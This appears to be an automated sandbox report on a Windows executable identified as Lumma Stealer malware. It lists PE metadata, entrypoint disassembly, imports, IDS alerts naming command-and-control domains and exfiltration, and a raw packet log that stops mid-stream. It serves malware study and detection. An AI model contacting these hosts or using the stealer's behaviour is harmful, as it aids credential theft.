                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows cui
                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x6756FE8D [Mon Dec 9 14:28:29 2024 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:8f4e72561d4efc2a78f43ace5ca381df

                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      call 00007F07A0B718DAh
                                                                                                                                                                                                                                      jmp 00007F07A0B71749h
                                                                                                                                                                                                                                      mov ecx, dword ptr [00436900h]
                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                      mov edi, BB40E64Eh
                                                                                                                                                                                                                                      mov esi, FFFF0000h
                                                                                                                                                                                                                                      cmp ecx, edi
                                                                                                                                                                                                                                      je 00007F07A0B718D6h
                                                                                                                                                                                                                                      test esi, ecx
                                                                                                                                                                                                                                      jne 00007F07A0B718F8h
                                                                                                                                                                                                                                      call 00007F07A0B71901h
                                                                                                                                                                                                                                      mov ecx, eax
                                                                                                                                                                                                                                      cmp ecx, edi
                                                                                                                                                                                                                                      jne 00007F07A0B718D9h
                                                                                                                                                                                                                                      mov ecx, BB40E64Fh
                                                                                                                                                                                                                                      jmp 00007F07A0B718E0h
                                                                                                                                                                                                                                      test esi, ecx
                                                                                                                                                                                                                                      jne 00007F07A0B718DCh
                                                                                                                                                                                                                                      or eax, 00004711h
                                                                                                                                                                                                                                      shl eax, 10h
                                                                                                                                                                                                                                      or ecx, eax
                                                                                                                                                                                                                                      mov dword ptr [00436900h], ecx
                                                                                                                                                                                                                                      not ecx
                                                                                                                                                                                                                                      pop edi
                                                                                                                                                                                                                                      mov dword ptr [00436940h], ecx
                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                      sub esp, 14h
                                                                                                                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                      xorps xmm0, xmm0
                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                      movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                      call dword ptr [00433F48h]
                                                                                                                                                                                                                                      mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                      xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                      call dword ptr [00433F00h]
                                                                                                                                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                      call dword ptr [00433EFCh]
                                                                                                                                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                      lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                      call dword ptr [00433F90h]
                                                                                                                                                                                                                                      mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                      lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                      xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                      xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                      xor eax, ecx
                                                                                                                                                                                                                                      leave
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      mov eax, 00004000h
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      push 00438008h
                                                                                                                                                                                                                                      call dword ptr [00433F68h]
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      push 00030000h
                                                                                                                                                                                                                                      push 00010000h
                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                      call 00007F07A0B790FEh
                                                                                                                                                                                                                                      add esp, 0Ch

                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x33ce00x3c.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0000x10.rsrc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x3b0000x1f88.reloc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x2ff080x18.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2c2880xc0.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x33e940x178.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                      .text0x10000x29ec00x2a000ac710cf82f0bf7022a4aaa856b12d73eFalse0.5421084449404762data6.670829529851215IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .rdata0x2b0000xa33c0xa400ee2f812185df99eb0802af6cb8092b28False0.42485232469512196data4.924236004008865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .data0x360000x27d40x1800472cb0caa2519382f7c923808f8b67faFalse0.3839518229166667data4.8137648404324445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .TLS0x390000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .rsrc0x3a0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .reloc0x3b0000x1f880x2000accec0655340d78d26259bfb9ab151b5False0.7593994140625data6.543821280470182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .bss0x3d0000x48e000x48e0021f9bc49b7a36b4c660dcde903a3c67dFalse1.0003383629931388data7.999338839034315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .bss0x860000x48e000x48e0021f9bc49b7a36b4c660dcde903a3c67dFalse1.0003383629931388data7.999338839034315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                      KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                                      USER32.dllCreateWindowExW, DefWindowProcW, GetMessageW, PostQuitMessage, RegisterClassW

                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                      2024-12-18T12:08:01.982894+01002057945ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)1192.168.2.8560411.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:01.982894+01002057983ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)1192.168.2.8560411.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:02.221141+01002057949ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)1192.168.2.8652951.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:02.221141+01002057981ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)1192.168.2.8652951.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:02.451321+01002057929ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)1192.168.2.8633321.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:02.451321+01002057979ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)1192.168.2.8633321.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:02.688843+01002057931ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)1192.168.2.8499481.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:02.688843+01002057977ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)1192.168.2.8499481.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:02.913400+01002057925ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)1192.168.2.8587581.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:02.913400+01002057973ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)1192.168.2.8587581.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:03.147869+01002057927ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)1192.168.2.8517381.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:03.147869+01002057975ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)1192.168.2.8517381.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:03.390183+01002057943ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)1192.168.2.8607641.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:03.390183+01002057971ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)1192.168.2.8607641.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:03.701372+01002057935ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)1192.168.2.8637191.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:03.701372+01002057969ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)1192.168.2.8637191.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T12:08:05.461549+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84970623.55.153.106443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:06.238765+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.84970623.55.153.106443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:08.583198+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:11.606157+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849707172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:11.606157+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849707172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:12.934292+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:16.629559+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849708172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:16.629559+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849708172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:18.263337+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:20.477697+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849709172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:21.853001+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849712172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:26.165876+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849713172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:32.213117+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849714172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:34.746544+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849715172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:34.751527+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.849715172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:40.694942+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849716172.67.157.254443TCP
                                                                                                                                                                                                                                      2024-12-18T12:08:41.408657+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849716172.67.157.254443TCP

                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:04.065743923 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:04.065798998 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:04.065869093 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:04.069221020 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:04.069237947 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:05.461487055 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:05.461549044 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:05.463787079 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:05.463797092 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:05.464096069 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:05.512118101 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:05.525614977 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:05.571332932 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238818884 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238850117 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238874912 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238884926 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238909006 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238909006 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238948107 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238965034 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238965034 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.238991976 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.410190105 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.410232067 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.410408020 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.410434961 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.410475016 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.442702055 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.442740917 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.442785025 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.442795038 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.444782972 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.515985966 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.516019106 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.516062021 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:06.516067982 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.368242979 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.368309021 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.368395090 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.369697094 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:07.369713068 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.583112955 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.583198071 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.587018967 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.587035894 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.587279081 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.588618040 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.588648081 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.588682890 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606170893 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606282949 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606343031 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606651068 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606677055 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606694937 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606702089 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.725709915 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.725768089 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.725907087 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.726401091 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.726412058 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.934211016 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.934292078 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.977649927 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.977682114 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.978071928 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.987922907 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.987951994 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.988053083 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629578114 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629645109 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629692078 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629728079 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629740000 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629755020 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629854918 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629859924 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629874945 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629995108 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.637738943 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.637803078 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.642205954 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.642307043 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.643109083 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.643141985 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.684020996 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.750876904 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.793414116 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.793443918 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824086905 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824139118 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824174881 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824228048 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824330091 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824374914 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824539900 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824562073 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824572086 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824578047 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:17.050815105 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:17.050863981 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:17.051295042 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:17.051295042 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:17.051337957 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:18.263250113 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:18.263336897 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:18.264683962 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:18.264699936 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:18.264952898 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:18.266299963 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:18.266464949 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:18.266499996 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:20.477710962 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:20.477819920 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:20.477951050 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:20.477981091 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:20.627985954 CET49712443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:20.628046989 CET44349712172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:20.628860950 CET49712443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:20.629281998 CET49712443192.168.2.8172.67.157.254
